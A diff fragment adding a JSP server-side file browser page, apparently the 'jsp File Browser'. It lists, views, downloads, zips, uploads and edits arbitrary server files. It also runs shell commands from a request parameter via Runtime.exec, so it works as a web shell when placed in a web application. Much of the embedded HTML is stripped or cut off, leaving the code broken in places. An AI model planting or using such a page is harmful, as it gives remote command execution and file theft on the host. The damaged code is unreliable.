    +			long time = (System.currentTimeMillis() - starttime) / 1000l;
    +			if (time - 60l >= 0){
    +				if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m";
    +				else return time / 60 + ":0" + (time % 60) + "m";
    +			}
    +			else return time<10 ? "0" + time + "s": time + "s";
    +		}
    +
    +		public String getTimeEstimated() {
    +			if (currSize == 0) return "n/a";
    +			long time = System.currentTimeMillis() - starttime;
    +			time = totalSize * time / currSize;
    +			time /= 1000l;
    +			if (time - 60l >= 0){
    +				if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m";
    +				else return time / 60 + ":0" + (time % 60) + "m";
    +			}
    +			else return time<10 ? "0" + time + "s": time + "s";
    +		}
    +
    +	}
    +
    +	public class FileInfo {
    +
    +		public String name = null, clientFileName = null, fileContentType = null;
    +		private byte[] fileContents = null;
    +		public File file = null;
    +		public StringBuffer sb = new StringBuffer(100);
    +
    +		public void setFileContents(byte[] aByteArray) {
    +			fileContents = new byte[aByteArray.length];
    +			System.arraycopy(aByteArray, 0, fileContents, 0, aByteArray.length);
    +		}
    +	}
    +
    +	public static class UploadMonitor {
    +
    +		static Hashtable uploadTable = new Hashtable();
    +
    +		static void set(String fName, UplInfo info) {
    +			uploadTable.put(fName, info);
    +		}
    +
    +		static void remove(String fName) {
    +			uploadTable.remove(fName);
    +		}
    +
    +		static UplInfo getInfo(String fName) {
    +			UplInfo info = (UplInfo) uploadTable.get(fName);
    +			return info;
    +		}
    +	}
    +
    +	// A Class with methods used to process a ServletInputStream
    +	public class HttpMultiPartParser {
    +
    +		private final String lineSeparator = System.getProperty("line.separator", "\n");
    +		private final int ONE_MB = 1024 * 1;
    +
    +		public Hashtable processData(ServletInputStream is, String boundary, String saveInDir,
    +				int clength) throws IllegalArgumentException, IOException {
    +			if (is == null) throw new IllegalArgumentException("InputStream");
    +			if (boundary == null || boundary.trim().length() < 1) throw new IllegalArgumentException(
    +					"\"" + boundary + "\" is an illegal boundary indicator");
    +			boundary = "--" + boundary;
    +			StringTokenizer stLine = null, stFields = null;
    +			FileInfo fileInfo = null;
    +			Hashtable dataTable = new Hashtable(5);
    +			String line = null, field = null, paramName = null;
    +			boolean saveFiles = (saveInDir != null && saveInDir.trim().length() > 0);
    +			boolean isFile = false;
    +			if (saveFiles) { // Create the required directory (including parent dirs)
    +				File f = new File(saveInDir);
    +				f.mkdirs();
    +			}
    +			line = getLine(is);
    +			if (line == null || !line.startsWith(boundary)) throw new IOException(
    +					"Boundary not found; boundary = " + boundary + ", line = " + line);
    +			while (line != null) {
    +				if (line == null || !line.startsWith(boundary)) return dataTable;
    +				line = getLine(is);
    +				if (line == null) return dataTable;
    +				stLine = new StringTokenizer(line, ";\r\n");
    +				if (stLine.countTokens() < 2) throw new IllegalArgumentException(
    +						"Bad data in second line");
    +				line = stLine.nextToken().toLowerCase();
    +				if (line.indexOf("form-data") < 0) throw new IllegalArgumentException(
    +						"Bad data in second line");
    +				stFields = new StringTokenizer(stLine.nextToken(), "=\"");
    +				if (stFields.countTokens() < 2) throw new IllegalArgumentException(
    +						"Bad data in second line");
    +				fileInfo = new FileInfo();
    +				stFields.nextToken();
    +				paramName = stFields.nextToken();
    +				isFile = false;
    +				if (stLine.hasMoreTokens()) {
    +					field = stLine.nextToken();
    +					stFields = new StringTokenizer(field, "=\"");
    +					if (stFields.countTokens() > 1) {
    +						if (stFields.nextToken().trim().equalsIgnoreCase("filename")) {
    +							fileInfo.name = paramName;
    +							String value = stFields.nextToken();
    +							if (value != null && value.trim().length() > 0) {
    +								fileInfo.clientFileName = value;
    +								isFile = true;
    +							}
    +							else {
    +								line = getLine(is); // Skip "Content-Type:" line
    +								line = getLine(is); // Skip blank line
    +								line = getLine(is); // Skip blank line
    +								line = getLine(is); // Position to boundary line
    +								continue;
    +							}
    +						}
    +					}
    +					else if (field.toLowerCase().indexOf("filename") >= 0) {
    +						line = getLine(is); // Skip "Content-Type:" line
    +						line = getLine(is); // Skip blank line
    +						line = getLine(is); // Skip blank line
    +						line = getLine(is); // Position to boundary line
    +						continue;
    +					}
    +				}
    +				boolean skipBlankLine = true;
    +				if (isFile) {
    +					line = getLine(is);
    +					if (line == null) return dataTable;
    +					if (line.trim().length() < 1) skipBlankLine = false;
    +					else {
    +						stLine = new StringTokenizer(line, ": ");
    +						if (stLine.countTokens() < 2) throw new IllegalArgumentException(
    +								"Bad data in third line");
    +						stLine.nextToken(); // Content-Type
    +						fileInfo.fileContentType = stLine.nextToken();
    +					}
    +				}
    +				if (skipBlankLine) {
    +					line = getLine(is);
    +					if (line == null) return dataTable;
    +				}
    +				if (!isFile) {
    +					line = getLine(is);
    +					if (line == null) return dataTable;
    +					dataTable.put(paramName, line);
    +					// If parameter is dir, change saveInDir to dir
    +					if (paramName.equals("dir")) saveInDir = line;
    +					line = getLine(is);
    +					continue;
    +				}
    +				try {
    +					UplInfo uplInfo = new UplInfo(clength);
    +					UploadMonitor.set(fileInfo.clientFileName, uplInfo);
    +					OutputStream os = null;
    +					String path = null;
    +					if (saveFiles) os = new FileOutputStream(path = getFileName(saveInDir,
    +							fileInfo.clientFileName));
    +					else os = new ByteArrayOutputStream(ONE_MB);
    +					boolean readingContent = true;
    +					byte previousLine[] = new byte[2 * ONE_MB];
    +					byte temp[] = null;
    +					byte currentLine[] = new byte[2 * ONE_MB];
    +					int read, read3;
    +					if ((read = is.readLine(previousLine, 0, previousLine.length)) == -1) {
    +						line = null;
    +						break;
    +					}
    +					while (readingContent) {
    +						if ((read3 = is.readLine(currentLine, 0, currentLine.length)) == -1) {
    +							line = null;
    +							uplInfo.aborted = true;
    +							break;
    +						}
    +						if (compareBoundary(boundary, currentLine)) {
    +							os.write(previousLine, 0, read - 2);
    +							line = new String(currentLine, 0, read3);
    +							break;
    +						}
    +						else {
    +							os.write(previousLine, 0, read);
    +							uplInfo.currSize += read;
    +							temp = currentLine;
    +							currentLine = previousLine;
    +							previousLine = temp;
    +							read = read3;
    +						}//end else
    +					}//end while
    +					os.flush();
    +					os.close();
    +					if (!saveFiles) {
    +						ByteArrayOutputStream baos = (ByteArrayOutputStream) os;
    +						fileInfo.setFileContents(baos.toByteArray());
    +					}
    +					else fileInfo.file = new File(path);
    +					dataTable.put(paramName, fileInfo);
    +					uplInfo.currSize = uplInfo.totalSize;
    +				}//end try
    +				catch (IOException e) {
    +					throw e;
    +				}
    +			}
    +			return dataTable;
    +		}
    +
    +		/**
    +		 * Compares boundary string to byte array
    +		 */
    +		private boolean compareBoundary(String boundary, byte ba[]) {
    +			byte b;
    +			if (boundary == null || ba == null) return false;
    +			for (int i = 0; i < boundary.length(); i++)
    +				if ((byte) boundary.charAt(i) != ba[i]) return false;
    +			return true;
    +		}
    +
    +		/** Convenience method to read HTTP header lines */
    +		private synchronized String getLine(ServletInputStream sis) throws IOException {
    +			byte b[] = new byte[1024];
    +			int read = sis.readLine(b, 0, b.length), index;
    +			String line = null;
    +			if (read != -1) {
    +				line = new String(b, 0, read);
    +				if ((index = line.indexOf('\n')) >= 0) line = line.substring(0, index - 1);
    +			}
    +			return line;
    +		}
    +
    +		public String getFileName(String dir, String fileName) throws IllegalArgumentException {
    +			String path = null;
    +			if (dir == null || fileName == null) throw new IllegalArgumentException(
    +					"dir or fileName is null");
    +			int index = fileName.lastIndexOf('/');
    +			String name = null;
    +			if (index >= 0) name = fileName.substring(index + 1);
    +			else name = fileName;
    +			index = name.lastIndexOf('\\');
    +			if (index >= 0) fileName = name.substring(index + 1);
    +			path = dir + File.separator + fileName;
    +			if (File.separatorChar == '/') return path.replace('\\', File.separatorChar);
    +			else return path.replace('/', File.separatorChar);
    +		}
    +	} //End of class HttpMultiPartParser
    +
    +	/**
    +	 * This class is a comparator to sort the filenames and dirs
    +	 */
    +	class FileComp implements Comparator {
    +
    +		int mode;
    +		int sign;
    +
    +		FileComp() {
    +			this.mode = 1;
    +			this.sign = 1;
    +		}
    +
    +		/**
    +		 * @param mode sort by 1=Filename, 2=Size, 3=Date, 4=Type
    +		 * The default sorting method is by Name
    +		 * Negative mode means descending sort
    +		 */
    +		FileComp(int mode) {
    +			if (mode < 0) {
    +				this.mode = -mode;
    +				sign = -1;
    +			}
    +			else {
    +				this.mode = mode;
    +				this.sign = 1;
    +			}
    +		}
    +
    +		public int compare(Object o1, Object o2) {
    +			File f1 = (File) o1;
    +			File f2 = (File) o2;
    +			if (f1.isDirectory()) {
    +				if (f2.isDirectory()) {
    +					switch (mode) {
    +					//Filename or Type
    +					case 1:
    +					case 4:
    +						return sign
    +								* f1.getAbsolutePath().toUpperCase().compareTo(
    +										f2.getAbsolutePath().toUpperCase());
    +					//Filesize
    +					case 2:
    +						return sign * (new Long(f1.length()).compareTo(new Long(f2.length())));
    +					//Date
    +					case 3:
    +						return sign
    +								* (new Long(f1.lastModified())
    +										.compareTo(new Long(f2.lastModified())));
    +					default:
    +						return 1;
    +					}
    +				}
    +				else return -1;
    +			}
    +			else if (f2.isDirectory()) return 1;
    +			else {
    +				switch (mode) {
    +				case 1:
    +					return sign
    +							* f1.getAbsolutePath().toUpperCase().compareTo(
    +									f2.getAbsolutePath().toUpperCase());
    +				case 2:
    +					return sign * (new Long(f1.length()).compareTo(new Long(f2.length())));
    +				case 3:
    +					return sign
    +							* (new Long(f1.lastModified()).compareTo(new Long(f2.lastModified())));
    +				case 4: { // Sort by extension
    +					int tempIndexf1 = f1.getAbsolutePath().lastIndexOf('.');
    +					int tempIndexf2 = f2.getAbsolutePath().lastIndexOf('.');
    +					if ((tempIndexf1 == -1) && (tempIndexf2 == -1)) { // Neither have an extension
    +						return sign
    +								* f1.getAbsolutePath().toUpperCase().compareTo(
    +										f2.getAbsolutePath().toUpperCase());
    +					}
    +					// f1 has no extension
    +					else if (tempIndexf1 == -1) return -sign;
    +					// f2 has no extension
    +					else if (tempIndexf2 == -1) return sign;
    +					// Both have an extension
    +					else {
    +						String tempEndf1 = f1.getAbsolutePath().toUpperCase()
    +								.substring(tempIndexf1);
    +						String tempEndf2 = f2.getAbsolutePath().toUpperCase()
    +								.substring(tempIndexf2);
    +						return sign * tempEndf1.compareTo(tempEndf2);
    +					}
    +				}
    +				default:
    +					return 1;
    +				}
    +			}
    +		}
    +	}
    +
    +	/**
    +	 * Wrapperclass to wrap an OutputStream around a Writer
    +	 */
    +	class Writer2Stream extends OutputStream {
    +
    +		Writer out;
    +
    +		Writer2Stream(Writer w) {
    +			super();
    +			out = w;
    +		}
    +
    +		public void write(int i) throws IOException {
    +			out.write(i);
    +		}
    +
    +		public void write(byte[] b) throws IOException {
    +			for (int i = 0; i < b.length; i++) {
    +				int n = b[i];
    +				//Convert byte to ubyte
    +				n = ((n >>> 4) & 0xF) * 16 + (n & 0xF);
    +				out.write(n);
    +			}
    +		}
    +
    +		public void write(byte[] b, int off, int len) throws IOException {
    +			for (int i = off; i < off + len; i++) {
    +				int n = b[i];
    +				n = ((n >>> 4) & 0xF) * 16 + (n & 0xF);
    +				out.write(n);
    +			}
    +		}
    +	} //End of class Writer2Stream
    +
    +	static Vector expandFileList(String[] files, boolean inclDirs) {
    +		Vector v = new Vector();
    +		if (files == null) return v;
    +		for (int i = 0; i < files.length; i++)
    +			v.add(new File(URLDecoder.decode(files[i])));
    +		for (int i = 0; i < v.size(); i++) {
    +			File f = (File) v.get(i);
    +			if (f.isDirectory()) {
    +				File[] fs = f.listFiles();
    +				for (int n = 0; n < fs.length; n++)
    +					v.add(fs[n]);
    +				if (!inclDirs) {
    +					v.remove(i);
    +					i--;
    +				}
    +			}
    +		}
    +		return v;
    +	}
    +
    +	/**
    +	 * Method to build an absolute path
    +	 * @param dir the root dir
    +	 * @param name the name of the new directory
    +	 * @return if name is an absolute directory, returns name, else returns dir+name
    +	 */
    +	static String getDir(String dir, String name) {
    +		if (!dir.endsWith(File.separator)) dir = dir + File.separator;
    +		File mv = new File(name);
    +		String new_dir = null;
    +		if (!mv.isAbsolute()) {
    +			new_dir = dir + name;
    +		}
    +		else new_dir = name;
    +		return new_dir;
    +	}
    +
    +	/**
    +	 * This Method converts a byte size in a kbytes or Mbytes size, depending on the size
    +	 *     @param size The size in bytes
    +	 *     @return String with size and unit
    +	 */
    +	static String convertFileSize(long size) {
    +		int divisor = 1;
    +		String unit = "bytes";
    +		if (size >= 1024 * 1024) {
    +			divisor = 1024 * 1024;
    +			unit = "MB";
    +		}
    +		else if (size >= 1024) {
    +			divisor = 1024;
    +			unit = "KB";
    +		}
    +		if (divisor == 1) return size / divisor + " " + unit;
    +		String aftercomma = "" + 100 * (size % divisor) / divisor;
    +		if (aftercomma.length() == 1) aftercomma = "0" + aftercomma;
    +		return size / divisor + "." + aftercomma + " " + unit;
    +	}
    +
    +	/**
    +	 * Copies all data from in to out
    +	 * 	@param in the input stream
    +	 *	@param out the output stream
    +	 *	@param buffer copy buffer
    +	 */
    +	static void copyStreams(InputStream in, OutputStream out, byte[] buffer) throws IOException {
    +		copyStreamsWithoutClose(in, out, buffer);
    +		in.close();
    +		out.close();
    +	}
    +
    +	/**
    +	 * Copies all data from in to out
    +	 * 	@param in the input stream
    +	 *	@param out the output stream
    +	 *	@param buffer copy buffer
    +	 */
    +	static void copyStreamsWithoutClose(InputStream in, OutputStream out, byte[] buffer)
    +			throws IOException {
    +		int b;
    +		while ((b = in.read(buffer)) != -1)
    +			out.write(buffer, 0, b);
    +	}
    +
    +	/**
    +	 * Returns the Mime Type of the file, depending on the extension of the filename
    +	 */
    +	static String getMimeType(String fName) {
    +		fName = fName.toLowerCase();
    +		if (fName.endsWith(".jpg") || fName.endsWith(".jpeg") || fName.endsWith(".jpe")) return "image/jpeg";
    +		else if (fName.endsWith(".gif")) return "image/gif";
    +		else if (fName.endsWith(".pdf")) return "application/pdf";
    +		else if (fName.endsWith(".htm") || fName.endsWith(".html") || fName.endsWith(".shtml")) return "text/html";
    +		else if (fName.endsWith(".avi")) return "video/x-msvideo";
    +		else if (fName.endsWith(".mov") || fName.endsWith(".qt")) return "video/quicktime";
    +		else if (fName.endsWith(".mpg") || fName.endsWith(".mpeg") || fName.endsWith(".mpe")) return "video/mpeg";
    +		else if (fName.endsWith(".zip")) return "application/zip";
    +		else if (fName.endsWith(".tiff") || fName.endsWith(".tif")) return "image/tiff";
    +		else if (fName.endsWith(".rtf")) return "application/rtf";
    +		else if (fName.endsWith(".mid") || fName.endsWith(".midi")) return "audio/x-midi";
    +		else if (fName.endsWith(".xl") || fName.endsWith(".xls") || fName.endsWith(".xlv")
    +				|| fName.endsWith(".xla") || fName.endsWith(".xlb") || fName.endsWith(".xlt")
    +				|| fName.endsWith(".xlm") || fName.endsWith(".xlk")) return "application/excel";
    +		else if (fName.endsWith(".doc") || fName.endsWith(".dot")) return "application/msword";
    +		else if (fName.endsWith(".png")) return "image/png";
    +		else if (fName.endsWith(".xml")) return "text/xml";
    +		else if (fName.endsWith(".svg")) return "image/svg+xml";
    +		else if (fName.endsWith(".mp3")) return "audio/mp3";
    +		else if (fName.endsWith(".ogg")) return "audio/ogg";
    +		else return "text/plain";
    +	}
    +
    +	/**
    +	 * Converts some important chars (int) to the corresponding html string
    +	 */
    +	static String conv2Html(int i) {
    +		if (i == '&') return "&";
    +		else if (i == '<') return "<";
    +		else if (i == '>') return ">";
    +		else if (i == '"') return """;
    +		else return "" + (char) i;
    +	}
    +
    +	/**
    +	 * Converts a normal string to a html conform string
    +	 */
    +	static String conv2Html(String st) {
    +		StringBuffer buf = new StringBuffer();
    +		for (int i = 0; i < st.length(); i++) {
    +			buf.append(conv2Html(st.charAt(i)));
    +		}
    +		return buf.toString();
    +	}
    +
    +	/**
    +	 * Starts a native process on the server
    +	 * 	@param command the command to start the process
    +	 *	@param dir the dir in which the process starts
    +	 */
    +	static String startProcess(String command, String dir) throws IOException {
    +		StringBuffer ret = new StringBuffer();
    +		String[] comm = new String[3];
    +		comm[0] = COMMAND_INTERPRETER[0];
    +		comm[1] = COMMAND_INTERPRETER[1];
    +		comm[2] = command;
    +		long start = System.currentTimeMillis();
    +		try {
    +			//Start process
    +			Process ls_proc = Runtime.getRuntime().exec(comm, null, new File(dir));
    +			//Get input and error streams
    +			BufferedInputStream ls_in = new BufferedInputStream(ls_proc.getInputStream());
    +			BufferedInputStream ls_err = new BufferedInputStream(ls_proc.getErrorStream());
    +			boolean end = false;
    +			while (!end) {
    +				int c = 0;
    +				while ((ls_err.available() > 0) && (++c <= 1000)) {
    +					ret.append(conv2Html(ls_err.read()));
    +				}
    +				c = 0;
    +				while ((ls_in.available() > 0) && (++c <= 1000)) {
    +					ret.append(conv2Html(ls_in.read()));
    +				}
    +				try {
    +					ls_proc.exitValue();
    +					//if the process has not finished, an exception is thrown
    +					//else
    +					while (ls_err.available() > 0)
    +						ret.append(conv2Html(ls_err.read()));
    +					while (ls_in.available() > 0)
    +						ret.append(conv2Html(ls_in.read()));
    +					end = true;
    +				}
    +				catch (IllegalThreadStateException ex) {
    +					//Process is running
    +				}
    +				//The process is not allowed to run longer than given time.
    +				if (System.currentTimeMillis() - start > MAX_PROCESS_RUNNING_TIME) {
    +					ls_proc.destroy();
    +					end = true;
    +					ret.append("!!!! Process has timed out, destroyed !!!!!");
    +				}
    +				try {
    +					Thread.sleep(50);
    +				}
    +				catch (InterruptedException ie) {}
    +			}
    +		}
    +		catch (IOException e) {
    +			ret.append("Error: " + e);
    +		}
    +		return ret.toString();
    +	}
    +
    +	/**
    +	 * Converts a dir string to a linked dir string
    +	 * 	@param dir the directory string (e.g. /usr/local/httpd)
    +	 *	@param browserLink web-path to Browser.jsp
    +	 */
    +	static String dir2linkdir(String dir, String browserLink, int sortMode) {
    +		File f = new File(dir);
    +		StringBuffer buf = new StringBuffer();
    +		while (f.getParentFile() != null) {
    +			if (f.canRead()) {
    +				String encPath = URLEncoder.encode(f.getAbsolutePath());
    +				buf.insert(0, "" + conv2Html(f.getName()) + File.separator + "");
    +			}
    +			else buf.insert(0, conv2Html(f.getName()) + File.separator);
    +			f = f.getParentFile();
    +		}
    +		if (f.canRead()) {
    +			String encPath = URLEncoder.encode(f.getAbsolutePath());
    +			buf.insert(0, "" + conv2Html(f.getAbsolutePath()) + "");
    +		}
    +		else buf.insert(0, f.getAbsolutePath());
    +		return buf.toString();
    +	}
    +
    +	/**
    +	 *	Returns true if the given filename tends towards a packed file
    +	 */
    +	static boolean isPacked(String name, boolean gz) {
    +		return (name.toLowerCase().endsWith(".zip") || name.toLowerCase().endsWith(".jar")
    +				|| (gz && name.toLowerCase().endsWith(".gz")) || name.toLowerCase()
    +				.endsWith(".war"));
    +	}
    +
    +	/**
    +	 *	If RESTRICT_BROWSING = true this method checks, whether the path is allowed or not
    +	 */
    +	static boolean isAllowed(File path) throws IOException{
    +		if (RESTRICT_BROWSING) {
    +            StringTokenizer stk = new StringTokenizer(RESTRICT_PATH, ";");
    +            while (stk.hasMoreTokens()){
    +			    if (path!=null && path.getCanonicalPath().startsWith(stk.nextToken()))
    +                    return RESTRICT_WHITELIST;
    +            }
    +            return !RESTRICT_WHITELIST;
    +		}
    +		else return true;
    +	}
    +
    +	//---------------------------------------------------------------------------------------------------------------
    +
    +	%>
    +<%
    +		//Get the current browsing directory
    +		request.setAttribute("dir", request.getParameter("dir"));
    +		// The browser_name variable is used to keep track of the URI
    +		// of the jsp file itself.  It is used in all link-backs.
    +		final String browser_name = request.getRequestURI();
    +		final String FOL_IMG = "";
    +		boolean nohtml = false;
    +		boolean dir_view = true;
    +		// View file
    +		if (request.getParameter("file") != null) {
    +            File f = new File(request.getParameter("file"));
    +            if (!isAllowed(f)) {
    +                request.setAttribute("dir", f.getParent());
    +                request.setAttribute("error", "You are not allowed to access "+f.getAbsolutePath());
    +            }
    +            else if (f.exists() && f.canRead()) {
    +                if (isPacked(f.getName(), false)) {
    +                    //If zipFile, do nothing here
    +                }
    +                else{
    +                    String mimeType = getMimeType(f.getName());
    +                    response.setContentType(mimeType);
    +                    if (mimeType.equals("text/plain")) response.setHeader(
    +                            "Content-Disposition", "inline;filename=\"temp.txt\"");
    +                    else response.setHeader("Content-Disposition", "inline;filename=\""
    +                            + f.getName() + "\"");
    +                    BufferedInputStream fileInput = new BufferedInputStream(new FileInputStream(f));
    +                    byte buffer[] = new byte[8 * 1024];
    +                    out.clearBuffer();
    +                    OutputStream out_s = new Writer2Stream(out);
    +                    copyStreamsWithoutClose(fileInput, out_s, buffer);
    +                    fileInput.close();
    +                    out_s.flush();
    +                    nohtml = true;
    +                    dir_view = false;
    +                }
    +            }
    +            else {
    +                request.setAttribute("dir", f.getParent());
    +                request.setAttribute("error", "File " + f.getAbsolutePath()
    +                        + " does not exist or is not readable on the server");
    +            }
    +		}
    +		// Download selected files as zip file
    +		else if ((request.getParameter("Submit") != null)
    +				&& (request.getParameter("Submit").equals(SAVE_AS_ZIP))) {
    +			Vector v = expandFileList(request.getParameterValues("selfile"), false);
    +			//Check if all files in vector are allowed
    +			String notAllowedFile = null;
    +			for (int i = 0;i < v.size(); i++){
    +				File f = (File) v.get(i);
    +				if (!isAllowed(f)){
    +					notAllowedFile = f.getAbsolutePath();
    +					break;
    +				}
    +			}
    +			if (notAllowedFile != null){
    +				request.setAttribute("error", "You are not allowed to access " + notAllowedFile);
    +			}
    +			else if (v.size() == 0) {
    +				request.setAttribute("error", "No files selected");
    +			}
    +			else {
    +				File dir_file = new File("" + request.getAttribute("dir"));
    +				int dir_l = dir_file.getAbsolutePath().length();
    +				response.setContentType("application/zip");
    +				response.setHeader("Content-Disposition", "attachment;filename=\"rename_me.zip\"");
    +				out.clearBuffer();
    +				ZipOutputStream zipout = new ZipOutputStream(new Writer2Stream(out));
    +				zipout.setComment("Created by jsp File Browser v. " + VERSION_NR);
    +				zipout.setLevel(COMPRESSION_LEVEL);
    +				for (int i = 0; i < v.size(); i++) {
    +					File f = (File) v.get(i);
    +					if (f.canRead()) {
    +						zipout.putNextEntry(new ZipEntry(f.getAbsolutePath().substring(dir_l + 1)));
    +						BufferedInputStream fr = new BufferedInputStream(new FileInputStream(f));
    +						byte buffer[] = new byte[0xffff];
    +						copyStreamsWithoutClose(fr, zipout, buffer);
    +						/*					int b;
    +						 while ((b=fr.read())!=-1) zipout.write(b);*/
    +						fr.close();
    +						zipout.closeEntry();
    +					}
    +				}
    +				zipout.finish();
    +				out.flush();
    +				nohtml = true;
    +				dir_view = false;
    +			}
    +		}
    +		// Download file
    +		else if (request.getParameter("downfile") != null) {
    +			String filePath = request.getParameter("downfile");
    +			File f = new File(filePath);
    +			if (!isAllowed(f)){
    +				request.setAttribute("dir", f.getParent());
    +				request.setAttribute("error", "You are not allowed to access " + f.getAbsoluteFile());
    +			}
    +			else if (f.exists() && f.canRead()) {
    +				response.setContentType("application/octet-stream");
    +				response.setHeader("Content-Disposition", "attachment;filename=\"" + f.getName()
    +						+ "\"");
    +				response.setContentLength((int) f.length());
    +				BufferedInputStream fileInput = new BufferedInputStream(new FileInputStream(f));
    +				byte buffer[] = new byte[8 * 1024];
    +				out.clearBuffer();
    +				OutputStream out_s = new Writer2Stream(out);
    +				copyStreamsWithoutClose(fileInput, out_s, buffer);
    +				fileInput.close();
    +				out_s.flush();
    +				nohtml = true;
    +				dir_view = false;
    +			}
    +			else {
    +				request.setAttribute("dir", f.getParent());
    +				request.setAttribute("error", "File " + f.getAbsolutePath()
    +						+ " does not exist or is not readable on the server");
    +			}
    +		}
    +		if (nohtml) return;
    +		//else
    +			// If no parameter is submitted, it will take the path from jsp file browser
    +			if (request.getAttribute("dir") == null) {
    +				String path = null;
    +				if (application.getRealPath(request.getRequestURI()) != null) path = new File(
    +						application.getRealPath(request.getRequestURI())).getParent();
    +
    +				if (path == null) { // handle the case where we are not in a directory (ex: war file)
    +					path = new File(".").getAbsolutePath();
    +				}
    +				//Check path
    +                if (!isAllowed(new File(path))){
    +                    if (RESTRICT_PATH.indexOf(";")<0) path = RESTRICT_PATH;
    +                    else path = RESTRICT_PATH.substring(0, RESTRICT_PATH.indexOf(";"));
    +                }
    +				request.setAttribute("dir", path);
    +			}%>
    +
    +
    +
    +
    +
    +
    +
    +<%
    +			//If a cssfile exists, it will take it
    +			String cssPath = null;
    +			if (application.getRealPath(request.getRequestURI()) != null) cssPath = new File(
    +					application.getRealPath(request.getRequestURI())).getParent()
    +					+ File.separator + CSS_NAME;
    +			if (cssPath == null) cssPath = application.getResource(CSS_NAME).toString();
    +			if (new File(cssPath).exists()) {
    +%>
    +
    +      <%}
    +			else if (request.getParameter("uplMonitor") == null) {%>
    +	
    +	<%}
    +		
    +        //Check path
    +        if (!isAllowed(new File((String)request.getAttribute("dir")))){
    +            request.setAttribute("error", "You are not allowed to access " + request.getAttribute("dir"));
    +        }
    +		//Upload monitor
    +		else if (request.getParameter("uplMonitor") != null) {%>
    +	<%
    +			String fname = request.getParameter("uplMonitor");
    +			//First opening
    +			boolean first = false;
    +			if (request.getParameter("first") != null) first = true;
    +			UplInfo info = new UplInfo();
    +			if (!first) {
    +				info = UploadMonitor.getInfo(fname);
    +				if (info == null) {
    +					//Windows
    +					int posi = fname.lastIndexOf("\\");
    +					if (posi != -1) info = UploadMonitor.getInfo(fname.substring(posi + 1));
    +				}
    +				if (info == null) {
    +					//Unix
    +					int posi = fname.lastIndexOf("/");
    +					if (posi != -1) info = UploadMonitor.getInfo(fname.substring(posi + 1));
    +				}
    +			}
    +			dir_view = false;
    +			request.setAttribute("dir", null);
    +			if (info.aborted) {
    +				UploadMonitor.remove(fname);
    +				%>
    +
    +
    +Upload of <%=fname%>

    +Upload aborted.
    +<%
    + }
    + else if (info.totalSize != info.currSize || info.currSize == 0) {
    + %>
    +
    +
    +
    +Upload of <%=fname%>

    +
    +
    +
    +
    +<%=convertFileSize(info.currSize)%> from <%=convertFileSize(info.totalSize)%>
    +(<%=info.getPercent()%> %) uploaded (Speed: <%=info.getUprate()%>).
    +Time: <%=info.getTimeElapsed()%> from <%=info.getTimeEstimated()%>
    +
    +<%
    + }
    + else {
    + UploadMonitor.remove(fname);
    + %>
    +
    +
    +Upload of <%=fname%>

    +Upload finished.
    +
    +<%
    + }
    + }
    + //Comandwindow
    + else if (request.getParameter("command") != null) {
    + if (!NATIVE_COMMANDS){
    + request.setAttribute("error", "Execution of native commands is not allowed!");
    + }
    + else if (!"Cancel".equalsIgnoreCase(request.getParameter("Submit"))) {
    +%>
    +Launch commands in <%=request.getAttribute("dir")%>
    +
    +
    +<%
    + out.println("
    \n" + + " + "> +
    + + + +
    + +
    + "> +
    +
    + + +<% + dir_view = false; + request.setAttribute("dir", null); + } + } + + //Click on a filename, special viewer (zip+jar file) + else if (request.getParameter("file") != null) { + File f = new File(request.getParameter("file")); + if (!isAllowed(f)){ + request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath()); + } + else if (isPacked(f.getName(), false)) { + //ZipFile + try { + ZipFile zf = new ZipFile(f); + Enumeration entries = zf.entries(); +%> +<%= f.getAbsolutePath()%> + + +

    Content of <%=conv2Html(f.getName())%>


    + + +<% + long size = 0; + int fileCount = 0; + while (entries.hasMoreElements()) { + ZipEntry entry = (ZipEntry) entries.nextElement(); + if (!entry.isDirectory()) { + fileCount++; + size += entry.getSize(); + long ratio = 0; + if (entry.getSize() != 0) ratio = (entry.getCompressedSize() * 100) + / entry.getSize(); + out.println(""); + + } + } + zf.close(); + //No directory view + dir_view = false; + request.setAttribute("dir", null); +%> +
    NameUncompressed sizeCompressed sizeCompr. ratioDate
    " + conv2Html(entry.getName()) + + "" + convertFileSize(entry.getSize()) + "" + + convertFileSize(entry.getCompressedSize()) + "" + + ratio + "%" + "" + + dateFormat.format(new Date(entry.getTime())) + "
    +

    + <%=convertFileSize(size)%> in <%=fileCount%> files in <%=f.getName()%>. Compression ratio: <%=(f.length() * 100) / size%>% +

    + +<% + } + catch (ZipException ex) { + request.setAttribute("error", "Cannot read " + f.getName() + + ", no valid zip file"); + } + catch (IOException ex) { + request.setAttribute("error", "Reading of " + f.getName() + " aborted. Error: " + + ex); + } + } + } + // Upload + else if ((request.getContentType() != null) + && (request.getContentType().toLowerCase().startsWith("multipart"))) { + response.setContentType("text/html"); + HttpMultiPartParser parser = new HttpMultiPartParser(); + boolean error = false; + try { + int bstart = request.getContentType().lastIndexOf("oundary="); + String bound = request.getContentType().substring(bstart + 8); + int clength = request.getContentLength(); + Hashtable ht = parser + .processData(request.getInputStream(), bound, tempdir, clength); + if (!isAllowed(new File((String)ht.get("dir")))){ + request.setAttribute("error", "You are not allowed to access " + ht.get("dir")); + error = true; + } + else if (ht.get("myFile") != null) { + FileInfo fi = (FileInfo) ht.get("myFile"); + File f = fi.file; + UplInfo info = UploadMonitor.getInfo(fi.clientFileName); + if (info != null && info.aborted) { + f.delete(); + request.setAttribute("error", "Upload aborted"); + } + else { + // Move file from temp to the right dir + String path = (String) ht.get("dir"); + if (!path.endsWith(File.separator)) path = path + File.separator; + if (!f.renameTo(new File(path + f.getName()))) { + request.setAttribute("error", "Cannot upload file."); + error = true; + f.delete(); + } + } + } + else { + request.setAttribute("error", "No file selected for upload"); + error = true; + } + request.setAttribute("dir", (String) ht.get("dir")); + } + catch (Exception e) { + request.setAttribute("error", "Error " + e + ". 
Upload aborted"); + error = true; + } + if (!error) request.setAttribute("message", "File upload correctly finished."); + } + // The form to edit a text file + else if (request.getParameter("editfile") != null) { + File ef = new File(request.getParameter("editfile")); + if (!isAllowed(ef)){ + request.setAttribute("error", "You are not allowed to access " + ef.getAbsolutePath()); + } + else{ +%> +Edit <%=conv2Html(request.getParameter("editfile"))%> + + +<% + BufferedReader reader = new BufferedReader(new FileReader(ef)); + String disable = ""; + if (!ef.canWrite()) disable = " readonly"; + out.println("
    \n" + + " + "> +
    + + + + + + + +
    >Ms-Dos/Windows>UnixWrite backup
